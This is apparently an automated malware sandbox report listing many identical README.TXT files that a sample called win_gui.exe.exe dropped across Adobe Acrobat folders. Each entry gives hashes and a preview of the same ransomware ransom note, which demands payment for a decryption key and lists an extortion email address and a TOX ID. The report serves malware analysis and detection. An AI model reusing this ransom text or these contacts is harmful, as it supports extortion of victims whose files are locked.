                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\img\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
